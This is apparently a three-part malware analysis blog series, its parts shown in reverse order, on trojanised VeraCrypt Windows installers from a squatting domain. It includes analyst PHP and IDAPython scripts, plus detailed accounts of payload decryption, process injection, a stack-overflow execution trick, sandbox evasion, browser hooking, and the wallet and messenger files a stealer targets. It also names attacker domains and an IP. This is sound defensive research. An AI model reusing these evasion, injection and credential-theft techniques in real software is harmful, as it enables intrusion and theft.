    else echo $ip;
    echo "\n";
  }
  $date->modify('+1 day');
}

Unfortunately, none still exist 😦

Generating and resolving alternative domains

How I am supposed to study this malware if I can’t fetch the next payload?

Family history

In Part 2, I identified another malware sample that contained the same weird-looking domain as I found hardcoded in this one. It turns out that this other sample also performs the same type of HTTP POST request to a /p1.php URL. It definitely sounds like an earlier version of our current sample.

From this point on, I will investigate the payloads downloaded by this older sample from May 2018 that was bundled with a SlimPDF Reader installer. That’s the only thing I have to analyze further. Given the similarities in the old and recent sample, we can assume that the recent payload I couldn’t capture due to the server being down is of the same nature. However, since the C2 server controls what gets returned and executed, this could have changed at any time.

Old sample PCAP

I downloaded the PCAP from Hybrid-Analysis in hope to find the next payload returned by the server, circa 2018.

HTTP requests made by the earlier sample

There seems to be a number of requests made to /p1.php.

Let’s focus on the first one.

First HTTP request/response by the older sample

The request matches perfectly what our sample does! This is a strong evidence that the old sample from 2018 is from the same family as today’s sample bundled with VeraCrypt.

About the response though, it is encrypted. We first need to figure out whether it’s even possible to decrypt it.

Brute-forcing the HTTP response’s encryption key

The HTTP response is decrypted (XORed) with randomNameMd5, which is generated “randomly” at runtime and contained in the HTTP request, but encrypted using the RSA key. We don’t have access to it from the network traffic.

However…

The code also checks whether the MD5 of randomNameMd5 (which I had called randomNameMd5Md5 earlier) is present in the response, and apparently it should be placed first given the line decryptedPayload = response[32:] ^ (pad of randomNameMd5). If you look at the Wireshark screenshot above, you can clearly see that the server’s response starts with what seems to be an MD5 hash.

The problem becomes knowing x given y=md5(x), and given x is also a hash.

Can I brute-force x? No.

But where does the entropy actually come from?

A rand() function.

And what’s the seed? The performance counter! To be precise, the lower DWORD of the counter. That’s 32 bits. And that is brute-forceable!

Here is the function that generates the random name.

generateRandomName function

And the random number generator, which is a linear congruential generator.

The rand() implementation

The implementation seeds the random number generator once with the performance counter. If we can find the value of this counter, we can derive the randomness and the generated name, and thus we can get randomNameMd5 and decrypt the server’s response.

Lazy as I am, I decided to implement the brute-force attack of the seed in PHP.

We know the target randomNameMd5Md5 is 93b3cdfdd3ef22d00d6807e7a0c054cb from the network capture. Let’s iterate the seed from 0 to 0xFFFFFFFF, generate the name with the randomness that comes out of it, and hash it twice to compare with this target hash. This operation could be easily parallelized, and probably adapted for hashcat to gain speed. However, this was fast enough for my purpose. It just took a few minutes.

<?php
$target_md5 = "93b3cdfdd3ef22d00d6807e7a0c054cb";
$alpha='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

function get_rand(&$pc) {
  $v0 = ((0x41C64E6D * $pc) & 0xFFFFFFFF) + 12345;
  if ($v0 < 1)
    $v0 = 0xC5531B80;
  $pc = $v0;
  return (($v0 >> 16) & 0x7FFF);
}

for($pc_i=0; $pc_i<0xFFFFFFFF; $pc_i++) {
  $name = '';
  $pc = $pc_i;
  for($i=0; $i<9; $i++) {
    $name .= $alpha[get_rand($pc) % 62];
  }
  if (md5(md5($name)) === $target_md5) {
    echo "\nFOUND SEED: PC (".dechex($pc_i)."), name '$name', md5 '".md5($name)."'\n";
    break;
  }
  if ($pc_i % 100000 == 0) {
    echo "[".dechex($pc_i)."]...\n";
  }
}

Let’s run it…

The seed was successfully brute-forced

Success! randomNameMd5 = 891dcadffb0e7f8f05693160cef0d6ab

This was a wild guess, betting that the old sample used the same random number generator and was checking the same information from the server’s response.

We can now decrypt the server’s response:

php > $md5 = "891dcadffb0e7f8f05693160cef0d6ab";
php > $enc = substr(file_get_contents('first-request-response.bin'), 32);
php > file_put_contents('first-request-response.dll', $enc ^ str_repeat($md5, ceil(strlen($enc)/32)));

The response is actually a DLL file, which I uploaded to VirusTotal since it wasn’t known. It got detected by 32/70 AVs. This file has a built-in path for the PDB debug info, with a username and a project name!

The first payload downloaded by the old sample appears to be named as NukeSuccses14 made by Andre

This payload is apparently part of a project called “NukeSuccses14” (sic) that Mr. Andre was storing on his desktop.

Accordingly, let’s name this DLL as int32.dll.

Smarter way to decrypt payloads

Now that I see the mysterious hash and the encrypted server’s response again, I feel bad.

Typically, when “encrypting” an executable by XORing it with whatever repetitive pattern, there are areas full of zeros in the executable that will be “encrypted” as the pattern itself. This is because zero is neutral for the XOR operation, i.e., zeros XOR something = something. When that something is an encryption key, the ciphertext is simply the key itself.

Check the ciphertext again. You can see the hash I just cracked at several places, minus some rotations.

The XOR key “891dcadffb0e7f8f05693160cef0d6ab” appears rotated at several places

This trick will help us decrypt the next payload without any effort, by just extracting the strings from the executable and hashing a sliding window of 32 bytes until we find a match.

$ strings -32 next-request-response.bin > next-request-response.bin.txt

<?php
$file=file_get_contents('next-request-response.bin');
$hash=substr($file, 0, 32); //82c114e7f40404f5289864c77ad9b69d
$strings=file_get_contents('next-request-response.bin.txt');
for ($i=0; $i<strlen($strings)-32; $i++) {
  if (md5(substr($strings,$i,32))===$hash) {
    echo substr($strings,$i,32);
    break;
  }
}
// output: 43f8e28e07c451205657dba8108f4a79

Old sample’s PCAP

After the int32.dll payload is fetched, the sample makes a new request to the same URL with the following POST data.

BfctndONzetT8JUTn+Xh3hhMsE4gcI1a38BjzNy9hjK1ZWgTflYe3MB0eePGUhJC
3hNg3FgLP7oYa04BhBtYONdNJ+aIcVlBIxHdSc1GGx0VDqQ6/unYKIvH3h7Es71d
W4wmVg9jwI+fTxOtAduv0x0DPtZrRko9kz7nySpHcox2uBEVlxtnjLGGPgWTRTrx
j9ktuWcRZCe59oK92RUS7GaIwLMJonqpm4RDUTIY+BQ0a0LcjyieZqG28pvRtyR2
ivWvWib9BsLa+NAtn7TQhrD5r7C21wMJiLFFsOSjt3eDeHxVK1QOn58OP1LpLcrq
l0bS38WsdbnFHSCtuR4i5w==
||delimiter||aW5mb3w2fDF8MXwwfEpHdGY1SGRCdFF8ZTFDM3JkSnwwfDIzNzEwNDB8bWFpbnx0
ZXMxfDEwMjR8NjE3
||delimiter||

Note that the first part before the delimiter is again encrypted. However, the rest is simply base64-encoded. For instance, aW5mb3w2fDF8MXwwfEpHdGY1SGRCdFF8ZTFDM3JkSnwwfDIzNzEwNDB8bWFpbnx0ZXMxfDEwMjR8NjE3 decodes to info|6|1|1|0|JGtf5HdBtQ|e1C3rdJ|0|2371040|main|tes1|1024|617.

This is still a little bit confusing, and the server’s response is empty beyond the expected hash.

In the third request, the non-encrypted part shows cGFzc3xn, which decodes to pass|g. In turn, the server returns a bigger payload than the first one, which I already decrypted in the above section with the more efficient decryption algorithm.

Let’s name this second payload as pass.dll.

This one doesn’t contain debug information.

On VirusTotal, pass.dll is detected by 34/69 AVs. It is labeled as “Password-Stealer” and “TrojanSpy.Stealer”, and is apparently made in Delphi…

Some other requests are re-runs of the first one (with a different ciphertext, but maybe with the same plaintext). The rest of the requests shows a decodable string that reads ping, with an empty response. Both those requests are made every 20 seconds…

Executing the payloads

One detail of importance, there is a remaining piece of code to analyze from data.dll. How is the first payload, int32.dll, executed?

This time, unlike the convoluted ways we have seen previously, the DLL is not written to disk. Rather, it is directly injected into dllhost.exe‘s memory.

We now have enough information to understand the main_stuff function we started from.

main_stuff shows an overview of data.dll‘s payload

The process dllhost.exe (from %windir%\System32) is created, and its process handle is passed to the last function sub_4040CC.

The injection works roughly as described in Method #2: PE Injection from https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process.

First, data.dll allocates some memory in dllhost.exe through VirtualAllocEx. Then it loads the content of int32.dll into it along with another function (sub_409158) from data.dll. I’m not sure what that one is doing, but probably has to do with properly rebasing the image. Finally, a new thread is created through CreateRemoteThread or RtlCreateUserThread.

int32.dll

Maybe after all this effort and little malicious activity (beyond Firefox/IE config change), we can finally get to find some nasty things?

After I again renamed several global variables as I did before, I explored the code of int32.dll. It is a relatively complex piece of software, and it would be pretty difficult to fully understand its functionality.

If we stick only to the main logic and some key string literals, I think that’s enough to get a picture.

The main logic goes as follows.

int32.dll main payload

First, the program checks whether it runs within dllhost.exe, runs svchost.exe and injects itself into it. It sets up inter-process communications through the named pipe \\.\pipe\[ID]. I can see a bunch of other things as well, which I’m not fully sure what it is about. I will share some key debug messages later below.

It then assumes it runs into other processes, such as iexplore.exe (IE), chrome.exe, firefox.exe, and explorer.exe. For each of these processes, the payload is adapted.

From what I understood, for the browsers, the idea is to hook network-related methods to be able to intercept the traffic. The fact that before the hooking, the same method loadMaskProxyAndGenerateRandomHash as we have seen in the previous payload is called makes me think that, once hooked, the network request calls may directly communicate with the C2 server and possibly leak information.

This is an excerpt from the Chrome hooking logic. The strings are somewhat meaningful.

Hooking Chrome SSL-related functions?

In svchost.exe, the function gethostbyname is hooked as well, which may be used to lie about certain domain name resolutions, and maybe redirect the victim’s traffic.

The function at sub_1000A9F0 runs explorer.exe and performs a number of UI operations using WindowFromPoint, SendMessageA, GetWindowPlacement GetWindowRect, ScreenToClient, ChildWindowFromPoint, MenuItemFromPoint, GetMenuItemID, PostMessageA, MoveWindow, SHAppBarMessage, …

I also found the same RSA public key we already found in data.dll, confirming that we are dealing with the same family, likely same author.

Other interesting things I found:

  • “X-HeyThere: 5eYEp80n3hM”
  • “As we walked along the flatblock marina, I was calm on the outside, but thinking all the time. So now it was to be Georgie the general, saying what we should do and what not to do, and Dim as his mindless greeding bulldog. But suddenly I viddied that thinking was for the gloopy ones and that the oomny ones use, like, inspiration and what Bog sends. For now it was lovely music that came to my aid. There was a window open with the stereo on and I viddied right at once what to do.”???
  • “AVE_MARIA”???
  • “webinject loaded!” in a function called when setting hooks on IE network functions.
  • “<script>window.location.href = window.location.href;</script>” appears in the function that hooks InternetReadFileExW (IE).
  • “–disable-http2 –use-spdy=off –disable-quic” is used in the hook for CreateProcessInternalW (kernel32.dll) when the process to create is chrome.exe. This adds arguments to Chrome that disables HTTP2, SPDY and QUIC, known to create problems with traffic-intercepting malware.
  • Related, there is “–no-sandbox –allow-no-sandbox-job –disable-3d-apis –disable-gpu –disable-d3d11 –user-data-dir=” for Chrome as well. This is used to start Chrome from sub_1000A9F0 as well.

From this brief analysis of int32.dll, it is reasonable to assume this is traffic-intercepting malware that hooks network functions in main browsers to perform man-in-the-browser attacks. There is also a graphical component to it, related to its need to disable hardware acceleration and various graphics features, but I’m not able to conclude anything more about this. The sample also establishes persistence by creating an entry under HKLM\Software\Microsoft\Windows\CurrentVersion\Run.

pass.dll

This payload was indeed compiled from Delphi as indicated by the string SOFTWARE\Borland\Delphi\RTL. It exports the function Do.

Interesting functions and strings include:

  • sub_414E3C(“Coins”)
    • “%appdata%\Electrum\wallets\”, “wallet.dat”, “electrum.dat”
    • “MultiBitHD\mbhd.wallet.aes”, “mbhd.checkpoints”, “mbhd.spvchain”, “mbhd.yaml”
    • “Monero\.address.txt”, “.keys”
    • “\BitcoinBitcoinQT\wallet.dat”
  • sub_41485C(“Skype”)
    • “main.db”
  • sub_413FB8(“Telegram”)
    • “%appdata%\Telegram Desktop\tdata\”, “D877F783D5*,map*”
  • sub_414AE4(“Steam”)
    • “\Config\*.vdf”

I guess it is safe to assume here that, given its label of “PasswordStealer”, this payload is actually interested in grabbing cryptocurrency wallets, Skype and Telegram info…

The behavior looks actually very similar to Azorult, a malware family from 2016. Azorult also grabs browser histories, saved credentials, etc. This behavior is likely implemented in this payload as well, as indicated by the use of CryptUnprotectData, which is used by Chrome to encrypt cookies and passwords under a Windows user account secret.

Conclusion

VeraCrypt was victim of “squatting phishing”, where some bad actors registered the phishy domain vera-crypt.com, that distributed a modified installer and portable version of VeraCrypt for Windows. Some of the payloads, intermediate registered domain names and server IPs seem to point to some people in Ukraine.

The modifications of VeraCrypt allowed the authors to fetch payloads from their C2 server whenever VeraCrypt[-64].exe is run, which would ultimately, after lots of evasion techniques, load and run various known malware payloads. Although I am not sure of the exact final payload that was served in the case of VeraCrypt, the analysis of a previously known payload from the same family of modified installers, showed two payloads: a traffic-interception malware that has capabilities to modify network traffic despite HTTPS by setting itself as a man-in-the-browser through network function hooking; and a browser history & password/cryptocurrency wallet/chat credentials stealer.

Thanks for following my first malware reverse-engineering write-up til this point!

For comments and suggestions, ping me at @xavier2dc.

An Analysis of Modified VeraCrypt binaries (Part 2)

Continuing on the analysis of the fake VeraCrypt Windows installer distributed on httx://vera-crypt[.]com, I am now reverse-engineering the downloaded payloads. Before I can jump to the main functionalities of the malware, I have to go through obfuscation and anti-analysis techniques. This part goes in details into these techniques, and is targeted at above-beginner reverse-engineers. I am also sharing IDAPython scripts to decrypt encrypted strings. For the real payload analysis, see Part 3.

Part 1 summary: The distributed binary is a modified VeraCrypt installer that installs a modified copy of VeraCrypt which fetches a first stage payload from a remote server, which in turn downloads a bunch of binaries and stores them on disk, some of them encrypted (XORed) with an ID generated by the server.

Second-stage payload

After the first-stage payload drops several files on disk, it runs the [ID].exe image:

Making the [ID].exe file path, the URL, downloading and writing the payload to disk, and executing it

Let’s dig into [ID].exe! Although I was analyzing the 64-bit modified VeraCrypt and the first-stage payload was 64-bit accordingly, this executable is 32-bit.

Obfuscated starting function

Complications arise.

The binary is designed to waste my time.

First, the entry point is a function that places data on the stack, an integer at a time, with hundreds of mov instructions. Sometimes, this is a strategy malware uses to reconstruct a code section into the stack then jump to it. But not this time. This is just plain useless.

Lots of mov instructions to slowly put data on the stack

3,820 boring mov instructions and three useless functions later, we have something.

Reconstructed main function of [ID].exe

The waste_my_time functions (naming is mine) were designed to be useless, yet fake that something normal is happening to lure tools that use static analysis into thinking that this is a legit program.

I’m not going to detail what they do, because actually, they are never executed… Indeed, the loop variable is incremented by 2 starting from 0, thus it remains even and therefore never takes the value 143. This is what we call dead code.

The real start of this program is located in what I named the real_main function.

Start ok

I should have seen it coming. In previous payloads, the author(s) often made use of the OutputDebugStringA function, likely to help them (lazily) build the program. That’s the equivalent of putting printf("I'm here") everywhere to debug a program by observing the console output. I should have started looking for calls to this function first. Good to know for next time.

The function tries to load the DLL named after the md5 hash of the lowercased username (see Part 1 for how it’s been put to disk), and call the exported function data. If successful, it loads and decrypts the big_log file, and jumps to it somehow.

[ID].exe main payload

For the sake of digging into reverse-engineering details and getting exposed to obfuscation techniques, I will describe all these steps, although we sort of know that the next useful thing to look at is that big_log file.

data()

Let’s load the md5(lower(username)).dll first, and look at the data function.

Part of the data function

The decompiled code is a bit messy, so we will study the assembly directly.

Basically, the function gets the path of the %temp% folder (GetTempPathA), appends “start3.txt” to it, to be used later. Then it gets information about the available memory through GlobalMemoryStatusEx, checks whether there’s more than 4GB of RAM, in which case it continues to the next check. If not or if there’s an insane amount of memory (like, the higher 4 bytes or the DOUBLE DWORD is negative?), the function returns. If there is less than 4GB available, at least there should be 1GB to proceed further.

The next check is about trying to figure out whether the program is being emulated or dynamically analyzed in a framework that skips Sleeps. It does so by measuring whether a Sleep has been executed and enough time has elapsed. Otherwise, this indicates the program isn’t running in a normal environment, is likely being analyzed, and therefore the program wants to terminate.

End of the data fuction

The function then tries to check for the presence of %temp%\start3.txt, which should not normally exist. If it does, this likely means that an analysis environment is faking the presence of the file to let the program continue to run (allegedly it needs that file, right?).

Finally, the program checks whether there is at least two CPU cores. Single-core/single-thread CPUs are too old to be a realistic environment nowadays.

In conclusion, data is just an anti-analysis function.

Loading, decrypting, overflowing, jumping

After making sure the program isn’t run in an analysis environment, the next payload is executed.

The interesting thing is how the payload is executed.

It is not a full-fledged EXE or DLL, it is just pure code. To be executed, it has to be copied to the stack at the right location then jumped to. It also has to be PIC (Position-Independent Code), unless the hardcoded addresses are calculated accurately.

big_log is 4,257 bytes. Keep in mind this number.

Decrypting

To “decrypt” big_log the way [ID].exe does, you can simply do (PHP):

php > $id = "89D5ACAA6B4C4765CFD8F8";  //replace with your ID
php > $bl = file_get_contents($id.'\\big_log');
php > file_put_contents($id.'\\big_log.dll", $bl ^ str_repeat($id, ceil(strlen($bl)/strlen($id))));

Looking at the decrypted content, I found the end of the file interesting.

End of decrypted big_log

Plenty of NOPs as you would see for padding, then 8 bytes and 0xFF. We’ll get back to that later.

Overflowing

The function, which I called copy_to_stack, allocates 4,244 bytes on the stack, then calls memmove(4257, &biglog, &var_1094), with var_1094 being located just 0x1094 (4,244) bytes above EBP.

You see what’s going to happen?

Copy the decrypted payload to the stack

Buffer overflow!

The copy of the big_log code (4,257 bytes) to the stack is designed to overflow the allocated buffer (only 4,244 bytes) and overwrite part of the stack. Namely, the overflow is of 4257-4244 = 13 bytes. What is being overwritten?

In the stack at EBP, you are supposed to find the saved EBP (pushed in the function prologue at .text:004019F0 here) of the previous stack frame, to be restored during the epilogue (.text:00401A16 here).

At EBP+4, you find the return address, which is the address of the next instruction in the previous function, that’s where the EIP will go after the retn at 00401A17.

Then, at EBP+8 and EBP+C, there are the arguments to the function copy_to_stack, which were in this case the address of the buffer that contains big_log, and its size.

I debugged [ID].exe and put a breakpoint on this function. Before and after the memmove, you can see what’s changing around EBP (19EC7C here).

The previous return address (402E69) has changed to 402B39. The saved EBP has been NOP’d and the first and a bit of the second argument have been overwritten.

That means when copy_to_stack finishes, EBP becomes 90909090, and the flow continues at 402B39. And what do we find at this address, which is still located in [ID].exe’s code?

Code at 402B39

That’s a jmp esp.

And what is ESP here? Let’s count: at the beginning of copy_to_stack, after the initial push EBP, we have EBP=ESP, then there are three pushes that are compensated by the add esp, 12. Then, ESP=EBP, and the pop ebp consumes one DWORD, making ESP=EBP+4 (now pointing at the return address). After retn consumes another DWORD, ESP becomes EBP+8, pointing to the last 5 bytes of big_log at 19EC84: E95FEFFFFF.

E95FEFFFFF in turn is the machine code for a relative jmp to FFFFEF5F, the 2s complement of 10A1, making it effectively go backward by 0x10A1 bytes from EIP after the jump. 0x10A1 is actually 4,257, the size of big_log. That means this jump goes back to the beginning of the payload.

Let’s summarize: [ID].exe loads and decrypts big_log to a buffer, which gets copied onto the stack while overflowing the saved EBP and return address. The flow eventually uses a gadget in [ID].exe’s code to jump to ESP, freshly overwritten with a relative jump back to the beginning of the decrypted big_log payload on the stack.

That’s the convoluted way this piece of malware executes big_log!

Executing the payload

big_log wants to load kernel32.dll and call VirtualAlloc from it, but does not want any mention of “kernel32.dll” in its code, what can it do instead?

Answer: Iterate over loaded DLL names, calculate a checksum on the name, and compare it to a hardcoded value! That’s what I understood after debugging the program for a while.

Finding kernel32.dll in big_log, breakpoint set on the comparison with a hardcoded checksum

The checksum algorithm is trivial, and can be translated into PHP as follows:

<?php
// implements the ror (rotate) instruction over a dword
function ror($data, $bits) {
	$tmp = str_pad(decbin($data), 32, "0", STR_PAD_LEFT);
	return bindec(substr($tmp, -$bits).substr($tmp, 0, -$bits));
}

function checksum($name) {
	// convert name to Unicode
	$name = mb_convert_encoding(strtoupper($name), 'UTF-16LE', 'UTF-8');

	$state = 0;
	for($i=0;$i<strlen($name);$i++) {
		$state = ror($state, 0xD);
		$state += ord($name[$i]);
	}
	return dechex($state);
}

echo checksum("KERNEL32.DLL");  //6a4abc5b

Whenever “KERNEL32.DLL” gets hashed, the digest is 6a4abc5b, which matches the comparison. Then, each exported functions of this DLL is iterated over to find a match with “VirtualAlloc”.

Finding VirtualAlloc in kernel32.dll exports by iterating on all exports

The address of VirtualAlloc is then calculated.

Calculating the address of VirtualAlloc

Then, the function is called as VirtualAlloc(NULL, 0xA68, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE).

Calling VirtualAlloc

Moving forward, the rest of big_log is copied to the newly allocated memory then executed. This is done by pointing to the location on the stack right after the jmp 19DCD0 at 19DD29, and copying 3,424 bytes until before the padding of NOPs we noticed before. The absolute offset in the decrypted big_log file is 324.

Copy the rest of big_log and call it

Second-stage big_log

After a very useful OutputDebugStringA("HelloShell"), the following code tries to locate the address of required functions from shell32.dll and user32.dll, by using similar techniques as we have covered before. In particular, it locates:

  • GetProcAddress
  • VirtualAlloc
  • LoadLibraryA
  • GetProcessHeap
  • HeapAlloc
  • HeapReAlloc
  • HeapFree
  • CreateFileA
  • GetFileSizeE
  • ReadFile
  • CloseHandle
  • lstrcatA
  • SHGetFolderPathA
  • wsprintfA

The next steps are as follows, as I reconstructed them after debugging the code:

VirtualAlloc(NULL, 260, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
SHGetFolderPathA(NULL, CSIDL_APPDATA, NULL, 0, &path);
lstrcatA(path, "id.txt");
h = CreateFileA(path, 1, FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, CREATE_NEW|CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
GetFileSize(h, &size);
VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
ReadFile(h, &f);
CloseHandle(h);
wsprintfA(&id, "%s", f);
VirtualAlloc(0, 258, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
SHGetFolderPathA(NULL, CSIDL_APPDATA, NULL, 0, &path2)
lstrcatA(path2,'\\');
lstrcatA(path2,id);
lstrcatA(path2,'\\');
lstrcatA(path2,'data');
OutputDebugStringA(path2);
h2 = CreateFileA(path2, GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_NEW | CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
GetFileSize(path2, &size2);
VirtualAlloc(NULL, size2, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
ReadFile(h2, &data);
CloseHandle(h2);

This basically gets the ID from id.txt, then loads [ID]\data.

data is then decrypted in memory by XORing it with id.

Next, the code is reminiscent of the PE loader found in the fake VeraCrypt binary (see Part 1). That is, making sure the DLL is a valid PE file, preparing the Import Address Table, copying the code section into a newly allocated region then calling the start function of data.

In summary, big_log simply loads and passes control over to the encrypted data DLL, thereafter named data.dll to differentiate it from the data function exported from md5(lower(username)).dll).

data.dll: String obfuscation

OutputDebugStringA("Start In Exe Nu");

After this greeting, a function is called that deals with decrypting a bunch of strings. The calls look like this:

dword_40A6E8 = (int)sub_40585A((int)"85&1DO<-!*<7-R<.3-&|R*U", "IBCC06IDNKOSI4FMIUER1E8", 23);
dword_40A198 = (int)sub_40585A((int)&unk_4060A0, "9S2L", 4);
dword_40A4D0 = (int)sub_40585A((int)&unk_4060B4, "XQI90QYP", 8);
dword_40A6E4 = (int)sub_40585A((int)&unk_4060D0, "9F3L7XE6ZK5N6", 13);
dword_40A4C4 = (int)sub_40585A((int)"b\a2!%,16\r\"9]\b", "9WSSQBTDCCT8U", 13);

The function sub_40585A simply XORs the first two arguments, the third one being the length. For the first instance, the result is: "85&1DO<-!<7-R<.3-&|RU" ^ "IBCC06IDNKOSI4FMIUER1E8", which gives “qwertyuioasddfzczxc.com”.

Oh, a domain name! It doesn’t seem to exist anymore, but apparently it was also used in another similar piece of malware in 2018 to exfiltrate data with POST requests to /p1.php. A previously known IP resolved from the domain is 176.114.6.101, located in Ukraine.
Spoiler for Part 3: this other piece of malware is from the same family!

The other string decryptions with “unk_” variables simply correspond to non-printable strings. For instance, unk_4060A0 is “\x17\x30\x5D\x21”. Once XORed with “9S2L”, it gives “.com”.

Sequential string decryption

I see some “CryptEncrypt” and “CryptHashData” names, that means we may have fun later on with some crypto! Unless the code just prepares the strings for all exported functions and in the end do not use all of them 😦

Automatic name decryption with IDAPython

Instead of debugging and renaming the variables manually in IDA, I decided to try to make my first IDAPython script. I followed this tutorial on automatically decrypting strings in a specific malware sample, then instead of adding a comment, I renamed the variable to the decrypted string.

The code goes as follows. It first gets all the Xrefs to the decryption function (located at 0x40585A), then identifies the last three pushes as the two strings to XOR and their length. I found cases where the length was pushed with a push 123, pop ebx, push ebx, so in case I find a push e** in place of the length, I instead calculate the string length, hoping it captures everything (there might be null bytes in some strings).

After XORing the two identified strings, the script identifies the next mov dword_ABCDEF, eax and renames the variable to the decrypted string.

for x in XrefsTo(0x40585A, flags=0):
  ref = x.frm
  dec = decryptAtAddress(ref)
  print "Ref Addr: 0x%x | Decrypted: %s" % (x.frm, dec)
  renameNextVar(ref, dec)

def find_previous_push(addr):
  while True:
    addr = idc.PrevHead(addr)
    if GetMnem(addr) == "push":
      #print "We found a push at 0x%x" % GetOperandValue(addr, 0)
      if "e" in GetOpnd(addr, 0):
        return [addr, -1]
      return [addr, GetOperandValue(addr, 0)]
      break

def find_next_mov(addr):
  while True:
    addr = idc.NextHead(addr)
    if GetMnem(addr) == "mov" and "eax" in GetOpnd(addr, 1):
      #print "We found a mov at 0x%x" % GetOperandValue(addr, 0)
      return [addr, GetOperandValue(addr, 0)]
      break

def decryptAtAddress(addr):
  # get last push (first string)
  [addr, arg1] = find_previous_push(addr)
  # get second to last push (second string)
  [addr, arg2] = find_previous_push(addr)
  # get third to last push (length)
  [addr, length] = find_previous_push(addr)

  # could not identify length (e.g., push ebx instead of push 10)
  if length < 0:
    s1 = GetString(arg1,-1)
    s2 = GetString(arg2,-1)
    if s1 is None:
      ls1 = 0
    else:
      ls1 = len(s1)
    if s2 is None:
      ls2 = 0
    else:
      ls2 = len(s2)

    length = max(ls1, ls2)

  # sanity check
  if length > 500:
    length = 500
 
  out = ""
  # actually XOR the strings
  for i in range(0,length):
    out += chr(Byte(arg1) ^ Byte(arg2))
    arg1 += 1
    arg2 += 1

  return out

def renameNextVar(addr, name):
  # get next mov X, eax
  [addr, arg] = find_next_mov(addr)

  if MakeNameEx(arg, name, idc.SN_NOWARN | idc.SN_NOCHECK):
    print "Renamed 0x%x to %s" % (arg, name)
  else:
    print "FAILED to rename 0x%x to %s" % (arg, name)

And this is the result:

After automatically renaming variables after their decrypted content

Beautiful! There are 350+ strings like this, so the script was quite useful.

Afterwards, strings that correspond to a library function name are loaded through GetProcAddress. To rename the corresponding variables that designate the function pointer, I also made a lazy script adapted from the pattern I’ve seen in the code: I noticed that there is a push for the string, then five instructions later, the function pointer is moved to a variable. So my script simply identifies the string being pushed and renames the variable 5 instructions later…

addr = 0x40331F
while addr < 0x403B67:
  if GetMnem(addr) == "push" and "[ebp+hModule]" not in GetOpnd(addr, 0):
    name = "_%s" % GetOpnd(addr, 0)
    print name
  else:
    addr = idc.NextHead(addr)
    continue
  nextMov = idc.NextHead(addr)
  nextMov = idc.NextHead(nextMov)
  nextMov = idc.NextHead(nextMov)
  nextMov = idc.NextHead(nextMov)
  nextMov = idc.NextHead(nextMov)
  if GetMnem(nextMov) == "mov" and "eax" in GetOpnd(nextMov, 1):
    MakeNameEx(GetOperandValue(nextMov, 0), name, idc.SN_NOWARN | idc.SN_NOCHECK)
    print "Renamed 0x%x to %s" % (GetOperandValue(nextMov, 0), name)
  addr = idc.NextHead(addr)

This gives me:

After automatically renaming function pointer variables

The script doesn’t work perfectly, but the remaining variables can be corrected manually.

data.dll: Anti-analysis checks

After decrypting many strings, data.dll checks for the presence of an emulator or a virtual machine in a number of ways.

First, the Windows username is checked against known keywords such as “sandbox”, “virus”, “malware”, “nod”, “kas”, “av”, “kis”, “STRAZNJICA.GRUBUTT”, “esset”.

Checking for known malware sandbox Windows username

Other checks are reminiscent of our previous analysis in Part 1: the size of the memory is assessed (here, the malware stops if there is less than 2.33GiB of RAM), Sleep functions are verified to be executed and not skipped, the number of CPU cores is verified (at least two cores are needed), and an inexistant file does not suddenly exist.

In addition, two new checks look for artifacts of VMware and Virtualbox by proving the registry for a known key, and for known driver files.

Simple check for the presence of VMware Tools from the registry
Checking for VirtualBox from known driver files

Overall, the anti-analysis checks run as follows.

Overall anti-analysis checks

In the next part of this write-up, I will describe the main payload of data.dll. Stay tuned!

Update: Part 3 is available and deals with analyzing the main likely payloads.

An Analysis of Modified VeraCrypt binaries (Part 1)

On January 29, 2020, The Twitter account of VeraCrypt (@VeraCrypt_IDRIX) posted a tweet about a fake VeraCrypt website (httx://vera-crypt[.]com) that was distributing modified VeraCrypt installers that are signed with a valid EV code signing certificate from an unknown company. I was intrigued. The fake website was still up, so I decided to look into it. Here is a write-up of my analysis to try to understand what the modified binaries do, how are they obfuscated, who the authors could be, and what’s the motivation.

A phishing website?

The fake website looked identical to the official VeraCrypt website, but the links on the pages didn’t work too well. In particular, the download page was only serving the installer binaries for Windows and Mac, and the portable version for Windows. The rest led to a 404 error page. Interestingly, the Mac binary was actually genuine, only Windows binaries were modified.

Assuming the binaries are malicious in some way (which we will know for sure very soon), a successful attack would first require a victim to be lured into visiting the fake website. In fact, someone abused Google Ads to promote the fake website when searching for “veracrypt” on Google. A contact at ESET further told me that the ad was most likely targeted at Canada only.

Modified VeraCrypt installer

In this article, I will focus on the modified installer for Windows, as it’s probably the most common format people download. It is signed by a certificate issued to Calmic Software Ltd, a UK software development company.

Signature of the fake VeraCrypt installer. SHA-256: 9ebad58d714acb30422394bf8473f98dbc94446fc6918287cf5c4dd11324de3b

The fake installer version info matches that of the official VeraCrypt v1.23 from September 2018.

Fake VeraCrypt’s version info

In terms of size, the fake installer is slightly smaller than the official one (35,821,320 vs. 35,837,752 bytes, respectively). This does not necessarily mean something was “removed”. For instance, the difference in the signature certificates could easily account for the difference. But this may hint at a slight modification of VeraCrypt, maybe a backdoor?

I compared both binaries using Beyond Compare, which looks at each byte from the two files and tries to account for misalignment due to inserted/removed data. That’s how I started when I studied the official builds of TrueCrypt against their source codes. On the right image here, you can visualize in red the sections that are dissimilar. The white block that fills the first quarter is a section where both files fully match. So, this is not a totally different binary. Rather, there is still a taste of VeraCrypt here.

TrueCrypt/VeraCrypt’s installer is actually built as follows: the files to extract/install on a system are compressed and packaged at the end of the installer’s binary file. The logic of the installer is located at the beginning, which is roughly the part that is identical between the official and fake installers. The non-matching part therefore seems to correspond mostly to the compressed payload.

Roughly same installers

Firing IDA Pro and BinDiff, I was able to identify mismatching functions inside the installer. Most functions matched, except for few ones.

BinDiff output showing one main function difference and maybe a few more in the installer

